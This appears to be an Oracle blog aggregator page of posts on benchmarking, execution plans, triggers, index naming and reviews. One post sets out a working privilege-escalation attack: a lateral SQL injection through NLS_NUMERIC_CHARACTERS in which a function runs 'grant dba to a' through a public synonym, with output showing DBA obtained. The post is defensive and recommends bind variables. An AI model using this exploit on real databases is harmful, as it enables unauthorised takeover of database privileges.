Oakies Blog Aggregator

Introducing SLOB – The Silly Little Oracle Benchmark

BLOG UPDATE 2012.02.08: I changed the URL to the kit and uploaded a new tar archive with permissions changes.

We’ve all been there.  You’re facing the need to assess Oracle random physical I/O capability on a given platform in preparation for OLTP/ERP style workloads. Perhaps the storage team has assured you of ample bandwidth for both high-throughput and high I/O operations per second (IOPS).  But you want to be sure and measure for yourself so off you go looking for the right test kit.

There is no shortage of transactional benchmark kits such as Hammerora, Dominic Giles’ SwingBench, and cost-options such as Benchmark Factory.  These are all good kits. I’ve used them all more than once over the years. The problem with these kits is they do not fit the need posed in the previous paragraph.  These kits are transactional, so the question becomes whether you want to prove Oracle scales those applications on your hardware or whether you want to test IOPS capacity. You want to test IOPS. So now what?

What About Orion?

The Orion tool has long been a standard for testing I/O at Oracle block sizes via the same I/O libraries that are linked into the Oracle server.  Orion is a helpful tool, but it can lead to a false sense of security.  Allow me to explain. Orion uses no measurable processor cycles to do its work. It simply shovels I/O requests into the kernel and the kernel (driver) clobbers the same I/O buffers in memory with the I/O (read) requests again and again. Orion does not care about the contents of I/O buffers and therein lies the weakness of Orion.

At one end of the spectrum we have fully transactional, application-like test kits (e.g., SwingBench); at the other end, low-level I/O generators like Orion. What’s really needed is something right in the middle and I propose that something is SLOB—the Silly Little Oracle Benchmark.

What’s In A Name?

SLOB stands for Silly Little Oracle Benchmark. SLOB, however, is neither a benchmark nor silly. It is rather small and simple though. I need to point out that by force of habit I’ll refer to SLOB with terms like benchmark and workload interchangeably. SLOB aims to fill the gap between Orion and full function transactional benchmarks. SLOB possesses the following characteristics:

  1. SLOB supports testing Oracle logical read (SGA buffer gets) scaling
  2. SLOB supports testing physical random single-block reads (db file sequential read)
  3. SLOB supports testing random single block writes (DBWR flushing capacity)
  4. SLOB supports testing extreme REDO logging I/O
  5. SLOB consists of simple PL/SQL
  6. SLOB is entirely free of all application contention

Yes, SLOB is free of application contention yet it is an SGA-intensive workload kit. You might ask why this is important. If you want to test your I/O subsystem with genuine Oracle SGA-buffered physical I/O it is best to not combine that with application contention.

SLOB is also great for logical read scalability testing which is very important, for one simple reason: It is difficult to scale physical I/O if the platform can’t scale logical I/O. Oracle SGA physical I/O is prefaced by a cache miss and, quite honestly, not all platforms can scale cache misses. Additionally, cache misses cross paths with cache hits. So, it is helpful to use SLOB to test your platform’s ability to scale Oracle Database logical I/O.

What Is The History Of The Kit?

I wrote parts of it back in the 1990s when I was in the Advanced Oracle Engineering group at Sequent Computer Systems and some of it when I was the Chief Architect of Oracle Database Solutions at PolyServe (acquired by HP in 2007). PolyServe was one of the pioneers in multi-headed scalable NAS and I needed workload harnesses that could drive I/O according to my needs.  The kit is also functionally equivalent to what I used in my own engineering work while I was the Performance Architect in Oracle’s Exadata engineering group (Systems Technology).  In short the kit has a long heritage considering how simple it is.

What’s In The Kit?

There are no benchmark results included. The kit does, however, include:

  • README files. A lot of README files. I recommend starting with ~/README-FIRST.
  • A simple database creation kit.  SLOB requires very little by way of database resources. I think the best approach to testing SLOB is to use the simple database creation kit under ~/misc/create_database_kit.  The directory contains a README to help you on your way. I generally recommend folks use the simple database creation kit to create a small database because it uses Oracle Managed Files so you simply point it to the ASM diskgroup or file system you want to test. The entire database will need no more than 10 gigabytes.
  • An IPC semaphore based trigger kit.  I don’t really need to point out much about this simple IPC trigger kit other than to draw your attention to the fact that the kit does require permissions to create a semaphore set with a single semaphore. The README-FIRST file details what you need to do to have a functional trigger.
  • The workload scripts. The setup script is aptly named setup.sh and to run the workload you will use runit.sh. These scripts are covered in README-FIRST.
  • Init.ora files. You’ll find test.ora under ~/misc/sample_data. The purpose of this init.ora is to show just how little tweaking Oracle Database requires to scale physical I/O and logical reads. The directory is named sample_data because I originally intended to offer pairs of init.ora and AWR reports so folks could see what different systems I’ve tested, what performance numbers I’ve seen and the recipe I used (the combination of connected pseudo users and init.ora parameters). The name of the directory remains but I pulled the content so as to not excite Oracle’s lawyers.

Models

The size of the SGA buffer pool is the single knob to twist for which workload profile you’ll generate. For instance, if you wish to have nothing but random single block reads you simply run with the smallest db_cache_size your system will allow you to configure (see README-FIRST for more on this matter).  On the other hand, the opposite is what’s needed for logical I/O testing. That is, simply set db_cache_size to about 4GB, perform a warm-up run and from that point on there will be no physical I/O. Drive up the number of connected pseudo users and you’ll observe logical I/O scale up bounded only by how scalable your platform is.  The other models involve writes. If you want to drive a tremendous amount of REDO writes you will again configure a large db_cache_size and execute runit.sh with only write sessions. From that point you can reduce the size of db_cache_size while maintaining the write sessions, which will drive DBWR into a frenzy.
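
To make the two read models concrete, here is a minimal sketch in SQL. It assumes an spfile-managed instance (with a plain init.ora you would simply edit the parameter), and the values are illustrative, not the kit’s test.ora settings:

-- physical random single-block read model: a cache so small that nearly
-- every read is a miss (use the smallest value your system will accept)
alter system set db_cache_size = 64M scope=spfile;

-- logical read model: a large cache; after a warm-up run the workload is
-- served entirely from the SGA
alter system set db_cache_size = 4G scope=spfile;

Restart the instance between model changes so the new buffer cache size takes effect.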

Who Has Used The Kit?

Several folks from the OakTable Network and other friends. Perhaps they’ll chime in on their findings and what they have learned about their platform as a result of testing with SLOB.

What You Should Expect From SLOB

I/O, lots of it! If you happen to be an Exadata user you’ll see about 190,000 physical read I/O (from Exadata Smart Flash Cache) generated from each instance of RAC in your configuration. Oracle does not misrepresent the truth in their datasheets regarding Exadata random cache reads. If you have a full-rack Exadata you too can now study the system characteristics under an approximated 1.5 million read IOPS workload. Testing Exadata with the write-intensive SLOB models will reveal capacities for DBWR and LGWR flushing.  If you have conventional storage you’ll drive the maximum it will sustain.

Where Is The Kit?

I’ve uploaded it to the OakTable.net website at the following URL. Simply extract the gzipped tar archive into a working directory and see README-FIRST.

http://oaktable.net/articles/slob-silly-little-oracle-benchmark

Filed under: oracle

Index Scan with Filter Predicate Based on a Subquery

Most execution plans can be interpreted by following a few basic rules (in TOP, Chapter 6, I provide such a list of rules). Nevertheless, there are some special cases. One of them is when an index scan, in addition to the access predicate, has a filter predicate applying a subquery.

The following execution plan, taken from Enterprise Manager 11.2, is an example:
[screenshot of the execution plan in Enterprise Manager]
Notes:

  • According to the order column, the first operation being executed is the scan of the I2 index. Unfortunately this is wrong. In fact, the first operation being executed is the scan of the I1 index. This is a bug in Enterprise Manager. I wanted to show you this example to demonstrate that correctly interpreting an execution plan can be difficult not only for us ;-)
  • The filter predicate IS NOT NULL is also wrong. This is not a bug, however. It is a limitation in the current implementation. The problem is that in some cases the V$SQL_PLAN and V$SQL_PLAN_STATISTICS_ALL views are not able to show all the necessary details.

Without seeing the query on which this execution plan is based, it is not at all obvious what’s going on. So, here is the query:

SELECT *
FROM t1
WHERE n1 = 8
AND n2 IN (SELECT t2.n1 FROM t2, t3 WHERE t2.id = t3.id AND t3.n1 = 8) 
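
If you want to reproduce a similar plan, a minimal schema along the following lines should be close. Everything here is inferred from the query and the predicate section rather than taken from the original test case, and you may need representative data, statistics and a NO_UNNEST hint to stop the optimizer from unnesting the subquery:

create table t1 (id number, n1 number, n2 number, pad varchar2(100));
create table t2 (id number, n1 number, pad varchar2(100));
create table t3 (id number, n1 number, pad varchar2(100));

create index i1 on t1 (n1);
create index i2 on t2 (n1);
create index i3 on t3 (n1);

-- the filter-subquery shape appears only when the subquery is not unnested
select *
from   t1
where  n1 = 8
and    n2 in (select /*+ no_unnest */ t2.n1
              from   t2, t3
              where  t2.id = t3.id
              and    t3.n1 = 8);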

Based on the query it is essential to point out that the access predicate "T2"."N1"=:B1 cannot be evaluated and, therefore, the scan of the I2 index cannot be carried out, without having a value passed through the B1 bind variable. In other words, without knowing the value of T1.N2.

To describe how this execution plan is carried out, let’s have a look at the information provided by the DBMS_XPLAN.DISPLAY function (which does not expose the limitation related to the filter predicate).

-----------------------------------------------
| Id  | Operation                      | Name |
-----------------------------------------------
|   0 | SELECT STATEMENT               |      |
|   1 |  TABLE ACCESS BY INDEX ROWID   | T1   |
|*  2 |   INDEX RANGE SCAN             | I1   |
|   3 |    NESTED LOOPS                |      |
|   4 |     TABLE ACCESS BY INDEX ROWID| T2   |
|*  5 |      INDEX RANGE SCAN          | I2   |
|*  6 |     TABLE ACCESS BY INDEX ROWID| T3   |
|*  7 |      INDEX RANGE SCAN          | I3   |
-----------------------------------------------

Predicate Information (identified by operation id):
---------------------------------------------------
2 - access("N1"=8)
    filter( EXISTS (SELECT /*+ LEADING ("T2" "T3") USE_NL ("T3") INDEX
           ("T3" "I3") INDEX_RS_ASC ("T2" "I2") */ 0 FROM "T3" "T3","T2" "T2" WHERE
           "T2"."N1"=:B1 AND "T3"."N1"=8 AND "T2"."ID"="T3"."ID"))
5 - access("T2"."N1"=:B1)
6 - filter("T2"."ID"="T3"."ID")
7 - access("T3"."N1"=8)

The operations are carried out as follows:

  1. Operation 2 applies the access predicate "N1"=8 by scanning the I1 index.
  2. For each key returned by the previous scan, the subquery is executed once. Note that the subquery carries out a nested loop. While the outer loop accesses the T2 table, the inner loop accesses the T3 table.
  3. The first operation of the outer loop is operation 5. It applies the access predicate "T2"."N1"=:B1 by scanning the I2 index. Based on the rowid returned by the index access the T2 table is accessed (operation 4).
  4. For each row returned by the outer loop, the inner loop is executed once. The first operation of the inner loop is operation 7. It applies the access predicate "T3"."N1"=8 by scanning the I3 index. Based on the rowid returned by the index access the T3 table is accessed (operation 6) and the filter predicate "T2"."ID"="T3"."ID" (the join condition) is applied. By the way, it is interesting to notice that, contrary to what usually happens, the join condition is not applied as an access predicate.
  5. If the subquery returns a row, the rowid returned by operation 2 can be used to access the T1 table (operation 1). The row extracted from this operation is sent to the caller.

All in all, this is a very special execution plan…

In summary, be careful when you see an index scan with a filter predicate applying a subquery. The execution plan might not be carried out as you expect at first sight. It is also essential to point out that in such a case the predicate information is essential to fully understand what’s going on.

Where TK agrees with TK (or: why are triggers harmful)

So far we've explored playing around with a few triggers to implement a business rule. In this post I'd like to step back a bit and take a bird's-eye view of the common use-cases that I see brought up for introducing triggers into the app-development picture.

The first use-case is: we use triggers to assign or modify column values of mutating rows (that is, rows currently being inserted, updated, or deleted). Here are a few typical examples of this use-case that, I'm sure, must look familiar to you too.

For this use-case we always use a row-level trigger (for each row), as this type of trigger allows us to manipulate :new.[column-name] variables. We can re-assign column values supplied by the triggering DML-statement, or initialize ones that were not supplied. So for instance the user enters all column-values but the Created and By_User columns, which are initialized by a row-trigger we wrote.
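
A minimal sketch of this use-case might look as follows (table and column names are purely illustrative):

create or replace trigger emp_bri
before insert on emp
for each row
begin
  -- initialize columns the user did not supply
  :new.created := sysdate;
  :new.by_user := user;
end;
/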
The second use-case is: we use triggers to execute insert/update/delete statements. So we perform some DML against a table. This table has some trigger, in which we perform more DML.

Of course this can lead to a cascading effect: the DML that we perform from within our trigger body might be against a table that too has triggers. In which there might be more DML-statements performed, and so on and so forth. Typical examples of why we perform DML-statements inside triggers, are: we want to audit changes against the table, or we want to maintain redundant data stored elsewhere in the database design.
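
A typical sketch of this use-case is an audit trigger along these lines (again, table and column names are assumed for illustration):

create or replace trigger emp_sal_aud
after update of sal on emp
for each row
begin
  -- more DML fired automagically by the triggering update
  insert into emp_audit (empno, old_sal, new_sal, changed_by, changed_on)
  values (:old.empno, :old.sal, :new.sal, user, sysdate);
end;
/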

The third use-case is: we use triggers to execute non-transactional stuff. And by "non-transactional" I mean stuff that, once executed inside our transaction, does not participate in a rollback, in case we (the code-path) decide to perform one.

The most beautiful example of the last decade for this is, we call a web-service inside our trigger body. In case this is a web-service that actually 'does something' (changes/transacts information at/behind the endpoint of the service), then obviously when we rollback our triggering DML-statement, whatever was changed by the web-service, remains changed. Other examples of this use-case are: we send email from our trigger body, or perform file I/O. We can also perform an autonomous transaction (one that actually performs some DML which given it's executed inside the autonomous TX, cannot be rolled back by the parent transaction). This is actually a blend of this use-case with the previous one.
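
A sketch of the autonomous-transaction variant of this use-case (names are illustrative); note that the logged row survives even if the triggering statement is rolled back:

create or replace procedure log_change (p_msg in varchar2)
as
  pragma autonomous_transaction;
begin
  insert into change_log (msg, logged_on) values (p_msg, sysdate);
  commit;  -- committed independently of the parent transaction
end;
/

create or replace trigger emp_bru
before update on emp
for each row
begin
  log_change('emp ' || :old.empno || ' is being updated');
end;
/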

So what's harmful about all these use-cases? Well, they make stuff happen automagically (copyright the other TK).

What we mean by this is, that instead of only getting the effect of the triggering DML-statement, you also get the effect of whatever is being performed inside the trigger body. And exactly that is the harmful bit.

In a SQL DBMS, the insert, update and delete 'operators' constitute three primitive operators that we can use to manipulate the data held inside the database (tables). Primitive here is used in the sense of primary or basic. Sort of like Inc(rement) and Dec(rement) are primitives that can be used in machine language to increase or decrease a register's value. These primitive operators have well understood and universally known change-semantics. Say you start with an empty EMP table and then insert an employee row: you will end up with a change to the EMP table, which now has a single row in it. And all other bits and pieces of the database remain unchanged.

Triggers executing automagic stuff change these universally well-understood change-semantics of our three primitive operators.

And this is harmful: because nobody (after you've gone) expects insert, update or delete to quietly behave differently. For those of you who have done some machine programming in a distant past: it's like increasing one of your registers, and suddenly (as an automagic side-effect) the top of the execution stack is increased also and has some subroutine's address pushed on it. Not something you'd expect...

The TCO (total cost of ownership) of an application sits not in initially building the thing. It sits in the years, sometimes decades, the thing lives. And you, but more probably others, maintain it. And more often than not these developers expect their available primitive operators to follow the primitive change-semantics.

I'll finish this post with the following thought:

If you agree on the three use-cases discussed being harmful, do you then also agree with me that:
  • The cascade delete option of a foreign key, and
  • The default clause of a table column, and
  • The char (fixed-length) datatype
are to be considered harmful too?
Aren't they conceptually about the exact same problem? Introducing different change-semantics to our three primitive operators?
I'd be interested to hear of any other 'features' that change the way insert, update or delete behave.

Index naming

Here’s a model of a little problem I came across recently. It’s something I wrote about many years ago, and I thought I’d seen a note on Metalink explaining that the issue had been addressed; but the problem is still there, even in 11.2.0.3.

We start with a little data set (and it’s my standard setup of 8KB blocks, LMTs, 1MB uniform extents, and no ASSM):

create table t1
as
with generator as (
	select	--+ materialize
		rownum id 
	from dual 
	connect by 
		level <= 10000
)
select
	trunc((rownum-1)/2)	product_id,
	mod(rownum-1,2)		flag1,
	mod(rownum-1,3)		flag2,
	rownum			n1,
	lpad(rownum,30)		v1
from
	generator	v1,
	generator	v2
where
	rownum <= 1000000
;


-- collect stats, compute, no histograms
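-- e.g. something like the following (a sketch only; the exact call used
-- in the original test is not shown):

begin
	dbms_stats.gather_table_stats(
		ownname          => user,
		tabname          => 'T1',
		estimate_percent => null,                       -- compute
		method_opt       => 'for all columns size 1'    -- no histograms
	);
end;
/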

alter table t1 add constraint t1_pk primary key (product_id,flag1, flag2) 
using index (
	create unique index t1_pk on t1(product_id, flag1, flag2)
);

create index t1_i1 on t1(product_id, flag2, flag1, n1,v1);

As so often happens with the anomalies I uncover on client sites, there’s something a bit odd about this model. The second index starts with all the columns of the primary key (although the column order is slightly different). There is a rationale for this: the second index makes a big difference to a particular overnight batch job because it eliminates a large number of random accesses to a very big table. The intention is to drop the primary index eventually and use this larger index to cover the primary key.

Here’s an example of a very simple SQL statement which is run very frequently during the day – but don’t ask why this statement happens, there is a good rationale but it would take a lengthy explanation.

select
	rowid
from
	t1
where
	product_id = 2500
;

Which index do you think Oracle will use to execute this query ? If it’s not obvious from the index definitions I’ll give you an extra clue by reporting a few of the index statistics as well.

INDEX_NAME             BLEVEL LEAF_BLOCKS CLUSTERING_FACTOR 
-------------------- -------- ----------- ----------------- 
T1_PK                       2       2,807             7,088 
T1_I1                       2       7,996             7,154 

The answer is that Oracle uses the larger index. Here are the execution plans I get from hinting the query to use each index in turn:

============
Hinted to PK
============

----------------------------------------------------------
| Id  | Operation        | Name  | Rows  | Bytes | Cost  |
----------------------------------------------------------
|   0 | SELECT STATEMENT |       |     2 |    34 |     3 |
|*  1 |  INDEX RANGE SCAN| T1_PK |     2 |    34 |     3 |
----------------------------------------------------------

======================
Hinted to larger index
======================

----------------------------------------------------------
| Id  | Operation        | Name  | Rows  | Bytes | Cost  |
----------------------------------------------------------
|   0 | SELECT STATEMENT |       |     2 |    34 |     3 |
|*  1 |  INDEX RANGE SCAN| T1_I1 |     2 |    34 |     3 |
----------------------------------------------------------

The two indexes produce the same cost (and you can check this in more detail in the 10053 trace) – so why does Oracle use the “wrong” index ? Because when you sort the index names alphabetically, T1_I1 comes before T1_PK. If you doubt me at this point, by the way, just run the test and then repeat it using the name T1_XX instead of T1_I1.

You might think the problem has something to do with bad statistics, of course – but that’s why I specified compute in the stats collection. To hammer the point home I’ve also run tests hacking the statistics on the T1_I1 index, doubling virtually every statistic (leaf blocks, clustering_factor, etc.) except the number of distinct keys – which I halved. There is a statistical solution – but I’d have to push the statistics on this index a very long way before the arithmetic for this query made the larger index more expensive than the smaller one.
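
For reference, the kind of statistics hack described above can be done with DBMS_STATS; the following is only a sketch (it reads the current values and writes back modified ones), not the script used for the tests:

declare
	l_numrows   number;
	l_numlblks  number;
	l_numdist   number;
	l_avglblk   number;
	l_avgdblk   number;
	l_clstfct   number;
	l_indlevel  number;
begin
	dbms_stats.get_index_stats(
		ownname => user, indname => 'T1_I1',
		numrows => l_numrows, numlblks => l_numlblks, numdist => l_numdist,
		avglblk => l_avglblk, avgdblk => l_avgdblk, clstfct => l_clstfct,
		indlevel => l_indlevel
	);

	dbms_stats.set_index_stats(
		ownname  => user, indname => 'T1_I1',
		numrows  => l_numrows,
		numlblks => l_numlblks * 2,        -- double the leaf block count
		numdist  => trunc(l_numdist / 2),  -- halve the number of distinct keys
		avglblk  => l_avglblk,
		avgdblk  => l_avgdblk * 2,
		clstfct  => l_clstfct * 2,         -- double the clustering factor
		indlevel => l_indlevel
	);
end;
/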

I thought I’d seen a note on MOS (Metalink) saying that this tie-break situation had been addressed with an extra test based on the number of distinct keys (I’m not sure it’s been implemented, but clearly these two indexes have the same number of distinct keys anyway). Perhaps a check on the absolute number of leaf blocks in the index might also be in order if the key count is a tie. In the meantime, of course, I can add a SQL Baseline to the query.

The choice of index doesn’t make any difference to the performance of any individual execution of the query, of course, but it does mean that both indexes end up taking space in the cache during the day when the larger index shouldn’t really be used, so statistically the wrong choice has an impact on every execution of this query and every other query on the system.

Repairman Jack: The Tomb…

The Tomb is the first book in the Repairman Jack series by F. Paul Wilson.

Jack fixes things. Not washing machines and stuff like that. He fixes situations for people. It’s a job that takes him outside the law and means he has to separate himself from most of the things society thinks of as normal. It also recently separated him from his girlfriend when she found out his job doesn’t involve fixing household appliances. Now he’s got to fix a situation for his ex-girlfriend involving a family curse that started generations ago in India.

Followers of the blog know I love The Dresden Files and the Felix Castor series. Repairman Jack hooks into exactly the same groove for me. Harry Dresden, Felix Castor and Jack are the same type of men. Strong, self-reliant and they get the job done in an action-packed way. Very appealing for a cowardly computer geek like myself… :) I’m looking forward to the next 14 books in the series.

Cheers

Tim…




Oracle Query Optimizer Vanishing Acts

February 3, 2012 A couple of days ago I noticed an interesting thread in the comp.databases.oracle.server Usenet group that described a problem of vanishing tables.  The title of the thread certainly caught my attention, and I was a bit disappointed when I found that there was little to no magic involved in the vanishing act.  The situation reported [...]

Captain Support: Not to the rescue…

This morning, the display on one of my computers was a bit odd. I rebooted the machine and when it came up I got no output on the monitor. I plugged my laptop into the monitor and that worked fine, so it looked like the graphics card had died. I popped down to a local PC store and had the choice of remortgaging my house for a new graphics card, or buying a cheap and cheerful one. I did the latter. Even so, the new card was much flashier than the old one.

I put the card in the machine and it booted up and I had a display again. Trouble was, GNOME shell had failed to start and I was knocked back into fallback mode, which looks a bit like GNOME 2. Sigh. Forgot to check the card against the support requirements of the ever-so-picky GNOME shell.

I now have a choice to make:

  • Ditch it and get a new graphics card… again…
  • Switch to KDE or XFCE… shudder…
  • Stay with the fallback option until Fedora 17, when allegedly GNOME shell will not be so bloody fussy.

I’m probably going to stick with the last option as I can’t be bothered to waste any more time on this. All of a sudden, Windows and Mac OS X don’t seem so bad after all…

Cheers

Tim…

PS. I don’t need a lecture on why GNOME shell is so picky. I know all the arguments. I’ve read all the crap. Doesn’t mean it’s not a pain in the ass when you buy a newer and more powerful graphics card and you end up with an inferior user experience.




Chronicle…

I thought Chronicle was a cool film. Three kids find some weird object and develop super powers. How will it affect them and how will they choose to use them?

It has the “shot on my camcorder” feel, like Cloverfield, and has a kind of Akira feel to me. While I was watching it I kept expecting someone to say, “With great power comes great responsibility!” :)

The effects are pretty cool. At the start they look like they are going to be a bit low budget, but by the end they get pretty impressive.

Nice mix of teen angst, super powers and destruction. Obviously not targeted for 42 year old men, but it hit the mark for me. I guess that says a lot. :)

Cheers

Tim…




All about Security - SQL Injection redux

I just wrote about SQL Injection yesterday - after giving a web seminar on Wednesday that touched on the topic.

One of the comments on that post was by David Litchfield; he wrote:

Hey Tom,

Funnily enough I just published a paper about doing the same thing with NUMBER concatenations. This was an addendum to a paper I wrote in 2008 on exploiting DATE concatenations - the same problem you discuss here. You can get the recent paper here: http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers and the first paper here: http://www.databasesecurity.com/dbsec/lateral-sql-injection.pdf


I read that new paper and learned something new (actually, much like David - I was kicking myself because I should have been able to see this problem coming as well.  It is just a variation on a theme after all).  In that paper, he demonstrates how to exploit a SQL Injection flaw using NLS settings with numbers.  That is something I hadn't considered before.  NLS settings for numbers are different than for dates.  With a date, I can set the format string to have any string of characters I want.  With numbers - you are very much restricted. On the face of it - it doesn't look like you can exploit a SQL Injection flaw with numbers like you can with dates.

But - you can.  Just not as flexibly.  But the end result can be as disastrous.

One of the follow-on comments to this posting by David was:

the problem David mentions in http://www.accuvant.com/capability/accuvant-labs/security-research/lateral-sql-injection-revisited-exploiting-numbers only arises since NUM_PROC is owned by SYS, as far as I can see, correct?

So, it's not really a problem since nobody ever does something as SYS, correct.

In his example, David used SYS to demonstrate with - which could lead people to believe "ah, it needs SYS to exploit this flaw".  But - it doesn't.  All it requires is an account with these privileges:

  • Create session
  • Create procedure
  • Create public synonym <<<=== these guys are evil!  Should be avoided
And another schema that has the ability to GRANT stuff - like DBA.  It doesn't have to be DBA, it could be any privilege they have the ability to grant.
Here is how to exploit the flaw.  First - read David's paper to get the background on the 'P ' NLS_NUMERIC_CHARACTERS.  Then you'll understand how:
a%ORA11GR2> select .1 from dual;

        .1
----------
        P1
works.  Once you have mastered that, all we need to do to exploit this type of SQL Injection flaw is this.  I'll have a DBA schema containing a procedure that uses dynamic SQL with string concatenation and a number as an input:
ops$tkyte%ORA11GR2> create or replace procedure do_something( l_num in number )
  2  as
  3      l_query  long;
  4      l_cursor sys_refcursor;
  5      l_rec    all_users%rowtype;
  6  begin
  7      l_query := '
  8       select *
  9         from all_users
 10        where user_id = ' || l_num;
 11      dbms_output.put_line( l_query );
 12  
 13      open l_cursor for l_query;
 14  
 15      loop
 16          fetch l_cursor into l_rec;
 17          exit when l_cursor%notfound;
 18          dbms_output.put_line( 'username = ' || 
                                   l_rec.username );
 19      end loop;
 20      close l_cursor;
 21  end;
 22  /
Procedure created.
Then, we'll have our account with the small set of privileges:
ops$tkyte%ORA11GR2> create user a identified by a;
User created.

ops$tkyte%ORA11GR2> grant create session, create procedure,
                    create public synonym to a;
Grant succeeded.
and we'll allow it to access this procedure - just like in my original SQL Injection article:
ops$tkyte%ORA11GR2> grant execute on do_something to a;
Grant succeeded.
Ok, so now we'll log in as A and run the procedure to see what it does:
ops$tkyte%ORA11GR2> connect a/a
Connected.
a%ORA11GR2> 
a%ORA11GR2> exec ops$tkyte.do_something( 5 );

     select *
       from all_users
      where user_id = 5
username = SYSTEM

PL/SQL procedure successfully completed.
Now, we suspect it might use string concatenation - so we'll create a function that might be able to exploit this:
a%ORA11GR2> create or replace function foobar return number
  2  authid current_user
  3  as
  4      pragma autonomous_transaction;
  5  begin
  6      execute immediate 'grant dba to a';
  7      return 5;
  8  end;
  9  /
Function created.
And then set up our public synonym for it and allow others to execute it:
a%ORA11GR2> create public synonym p1 for foobar;
Synonym created.

a%ORA11GR2> grant execute on foobar to public;
Grant succeeded.
and now for the magic:
a%ORA11GR2> alter session set nls_numeric_characters = 'P ';
Session altered.
and voilà:
a%ORA11GR2> set role dba;
set role dba
*
ERROR at line 1:
ORA-01924: role 'DBA' not granted or does not exist


a%ORA11GR2> exec ops$tkyte.do_something( .1 );

     select *
       from all_users
      where user_id = P1
username = SYSTEM

PL/SQL procedure successfully completed.

a%ORA11GR2> set role dba;

Role set.
I have DBA...
SQL Injection is insidious.  SQL Injection is hard to detect.  SQL Injection can be avoided - by simply using bind variables.  In the event a bind variable is not possible for some provable technical reason (and those events are few and far far far in between) you have to critically review that code over and over and try to think of every way it could be exploited.  The problem with that however is that before yesterday - I would have looked at this code and might have said "this looks ok".  
It is really hard to protect yourself from something you cannot see.



Updated a little later: Let me also say this:

If you use static sql in plsql - your code in plsql cannot be sql injected, period.  It is not possible.  The only way to get sql injected in plsql is to use dynamic sql - that is the only time.  So, if you want maximum protection from SQL Injection - if you just want to avoid it, you will:

a) write your SQL code in PL/SQL
b) call this PL/SQL from your java/c/c#/whatever code USING BINDS to pass all inputs and outputs to/from the database

If you do that - no SQL Injection attacks are possible.  
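
For completeness, here is what the earlier do_something procedure looks like when the dynamic SQL uses a bind variable instead of concatenation (a sketch; the procedure name is mine). With this form there is no string to inject into, so the NLS trick above does nothing:

create or replace procedure do_something_safe( l_num in number )
as
    l_cursor sys_refcursor;
    l_rec    all_users%rowtype;
begin
    -- the input is passed as a bind, never concatenated into the SQL text
    open l_cursor for
        'select * from all_users where user_id = :x' using l_num;

    loop
        fetch l_cursor into l_rec;
        exit when l_cursor%notfound;
        dbms_output.put_line( 'username = ' || l_rec.username );
    end loop;
    close l_cursor;
end;
/

Better still, since the statement is fixed, static SQL (an ordinary cursor FOR loop) would remove the dynamic SQL entirely.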

RMOUG

Just a quick reminder that the Rocky Mountain Oracle User Group Training days are just eleven days away. It’s one of the best Oracle events I’ve attended, and I’ll be there again this year. There are plenty of good speakers and interesting presentations on a wide range of topics – and if you’re wandering around between sessions with nothing to do, I’ll be around too and will be happy to say hello and have a chat.

Here’s the list of things I’ve pencilled in on my timetable so far. (Some of the gaps are there because I’m doing three presentations myself, some are there because I haven’t decided what to see yet.)

Wednesday
  9:15  Database I/O Performance: Measuring and Planning – Alex Gorbachev, Pythian
  10:45 Parallel Execution in RAC – Riyaj Shamsudeen, OraInternals
  Lunch I’ll be on one of the ACE Director’s lunch tables
  1:15  I’ll be speaking on “Single Table Access Paths”
  16:00 Making Sense of Big Data – Gwen Shapira, Pythian
  17:15 I’ll be speaking on “Two Table Joins”

Thursday
  8:30  Developing and Deploying Extremely Large Databases with Oracle 11gR2 – Daniel Morgan, Morgan’s Library
  9:45  Mining the AWR Repository for Capacity Planning, Visualization, and other Real World Stuff – Karl Arao, Enkitec
  11:15 I’ll be speaking on “Beating the Oracle Optimizer”
  13:30 Using Oracle Execution Plans for Performance Gains – Janis Griffin, Confio Software

If nothing else catches your eye, don’t miss the opportunity to hear Maria Colgan talking about the optimizer. She’s doing three presentations (and only one of them coincides with one of mine) and they’re all worth hearing.